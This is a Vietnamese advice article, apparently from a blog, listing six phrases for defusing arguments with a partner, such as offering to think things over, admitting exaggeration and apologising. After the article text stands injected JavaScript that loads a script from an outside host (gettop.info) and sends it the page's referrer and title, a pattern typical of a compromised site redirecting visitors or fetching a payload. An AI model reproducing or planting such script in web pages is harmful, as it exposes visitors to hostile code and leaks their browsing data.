Những câu nói xua tan nhanh cơn giận

 

Ông cha ta có câu: lời nói chẳng mất tiền mua lựa lời mà nói cho vừa lòng nhau. Nếu biết kiểm soát bản thân và chọn lựa lời khi nói, bạn hoàn toàn có thể không làm tổn thương người kia khi cãi nhau. Sau đây là những câu nói giúp cuộc tranh luận trở nên hạ hỏa:

 

1.Mình sẽ suy nghĩ kĩ về điều đó

 

Không nên cố chấp.  Đây là lời nói thể hiện sự cân nhắc của bạn với vấn đề. Nếu như hai bạn đang bất đồng về một điều gì đó, bạn hãy nói câu này để cho chàng biết những ý kiến của người đó sẽ được bạn tiếp thu và suy nghĩ. Và điều đó tất nhiên sẽ chứng tỏ rằng, bạn là một người biết nghe lời, tiếp thu và biết cân nhắc đúng sai.

 

2.Hãy cùng nhau nghĩ cách giải quyết vấn đề

 

Nóng nảy chả giúp sự việc trở nên tốt đẹp hơn. Mọi cuộc cãi vã đều dễ dẫn đến nỏng nảy và có thể một trong hai người sẽ dùng hành động chân tay để ‘nói chuyện’. Khi đó, cũng là lúc bạn cần làm đối phương  ‘hạ hỏa’ bằng câu nói trên. Câu nói đó sẽ làm thay đổi ý định ‘nói chuyện bằng bạo lực’. Nên nhớ, trong mọi hoàn cảnh, hãy cố gắng hòa bình để đối thoại chứ đừng dùng đến sức mạnh của ‘chiến sự’.

 

giai quyet van de

 

 

3.Chúng ta cần thống nhất điều này

 

Khi có cuộc tranh luận, bạn và người kia đều mỗi người một quan điểm và ra sức bảo vệ cho quan điểm đó, không ai chịu thừa nhận người kia. Điều này sẽ dẫn đến việc hai người như hai đường thẳng song song. Nếu để điều đó phát sinh lâu, mâu thuẫn sẽ ngày càng đỉnh điểm và dẫn đến xa cách quá lớn. Cách tốt nhất, hãy thống nhất 1 quan điểm chung cho mọi vấn đề để không bao giờ xảy ra bất đồng.

Hãy đặt lợi ích lên hàng đầu, không nên ích kỉ, cái gì đúng thì theo còn sai thì nêu ra để thảo luận.

 

4.Mình đã hơi cường điệu nó lên một chút

 

Đây cũng là một câu nói nhũn nhặn mà các bạn nên học để kiềm chế khẩu chiến. Nếu như thấy mình vừa lỡ lời chê bai thói xấu hay những điều ở đối phương  khiến bạn không hài lòng thì sau đó, hãy xoa dịu người  ấy bằng lời thú nhận rằng bạn đã hơi cường điệu hóa vấn đề. Chắc chắn, người đó  sẽ không còn tức giận bạn vì điều đó nữa.

 

5.Mình rất tiếc về điều đó

 

Dù đúng hay sai thì bạn và người kia cũng đã làm nên một cuộc khẩu chiến. Và điều đó khiến mối quan hệ của hai người căng thẳng. Bạn cũng có lỗi trong việc để xảy ra tình trạng này. Do đó, hãy thẳng thắn thừa nhận một phần trách nhiệm của mình trong việc cãi vã với chàng bằng câu nói: “Em rất tiếc vì giờ chúng ta lại bất đồng như vậy”. Bạn không hề hạ mình khi nói câu đó mà ngược lại, bạn sẽ có thể được tôn trọng hơn sau đó rất nhiều.

 

6.Nói lời xin lỗi

 

xin loi

 

 

Bạn không nên cảm thấy xấu hổ khi nói ra lời xin lỗi. Nếu sai thì hãy cứ xin lỗi, đó là một hành động văn minh chứ chẳng có gì hạ mình khiến bạn ‘mất giá’. Tất nhiên, chỉ nên nói câu này sau khi cả hai đã cùng trao đổi thẳng thắn và tìm ra nguyên nhân từ ai, chứ đừng vì sợ đối phương  mà vừa mới thấy họ  nóng đã nói như vậy. Họ sẽ nghĩ bạn là một người yếu đuối và không có lập trường.

Xin lỗi có khả năng hóa giải cơn giận và ngăn chặn các hiểu lầm có thể có trong tương lai. Trong lúc xin lỗi không thể xóa bỏ nỗi đau có thực đã xảy ra trong quá khứ, nhưng nếu nó được thoát ra một cách chân thành và có hiệu quả thì nó có thể hóa giải các mặt tiêu cực của các hành động gây lỗi.

Đừng để cái tôi quá lớn đè bẹp ý chí, đừng để nóng giận mà mất khôn. Đừng để hối tiếc vì những việc mình đã làm bởi trong thâm tâm bạn đâu có muốn xúc phạm người đó. Bạn và tôi hãy trở thành những người vui vẻ và sống một cuốc sống đầy ý nghĩa nhé !

 var d=document;var s=d.createElement(‘script’); s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *